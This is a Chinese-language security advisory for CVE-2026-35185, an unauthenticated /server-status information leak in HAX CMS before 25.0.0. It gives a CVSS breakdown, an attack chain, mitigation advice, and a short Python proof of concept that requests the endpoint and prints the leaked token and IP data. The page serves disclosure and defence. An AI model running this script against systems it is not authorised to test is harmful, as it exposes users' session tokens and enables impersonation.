IPBUF安全漏洞报告
English
CVE-2026-35185 CVSS 7.5 高危

CVE-2026-35185 HAX CMS信息泄露漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35185
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
HAX CMS

相关标签

信息泄露HAX CMS未授权访问敏感信息

漏洞概述

HAX CMS在25.0.0之前的版本中存在严重的信息泄露漏洞。由于其/server-status端点未设置访问控制,任何未经身份验证的攻击者均可直接访问。该端点暴露了包括用户认证令牌、用户活动记录、客户端IP地址及服务器配置在内的敏感信息,导致实时用户交互被监控及内部基础设施信息泄露。

技术细节

该漏洞的根源在于HAX CMS在配置管理上的疏忽。在受影响的版本中(25.0.0之前),系统默认启用了用于监控服务器运行状态的/server-status接口,却未配置相应的身份验证机制或IP白名单策略。根据CVSS 3.1评分向量(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N),该漏洞的利用复杂度低,无需任何权限即可通过网络远程触发。攻击者只需构造简单的HTTP请求访问该特定路径,即可获取服务器内部工作线程的状态。泄露的数据极其敏感,包括当前正在处理的请求链接、用户认证凭证以及客户端IP地址。这种信息暴露不仅违反了最小权限原则,还为攻击者提供了进一步渗透网络的宝贵情报,例如利用获取的Session Token进行身份冒充,或根据活跃IP进行针对性攻击,对系统的机密性构成严重威胁。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是HAX CMS,且版本低于25.0.0。
STEP 2
漏洞利用
攻击者向目标服务器发送未经授权的HTTP GET请求,访问路径为/server-status。
STEP 3
信息获取
服务器返回包含敏感信息(如user_token、客户端IP、配置详情)的页面,攻击者收集并解析这些数据以用于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def check_vulnerability(target_url): """ Check if the target HAX CMS instance exposes the /server-status endpoint. """ # Ensure the URL ends with a slash or handle path joining correctly if not target_url.endswith('/'): target_url += '/' endpoint = target_url + "server-status" try: print(f"[*] Checking target: {endpoint}") response = requests.get(endpoint, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed! /server-status is accessible.") print("[+] Leaked Data Sample:") print(response.text[:500]) # Print first 500 characters to verify content elif response.status_code == 403: print("[-] Access Forbidden. Endpoint might be protected.") else: print(f"[-] Received status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example-hax-cms.com" check_vulnerability(target)

影响范围

HAX CMS < 25.0.0

防御指南

临时缓解措施
如果无法立即升级,建议在边界防火墙或Web应用防火墙(WAF)上配置规则,阻断外部对 /server-status 路径的所有HTTP请求,或直接在服务器配置文件中禁用该状态页面模块。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表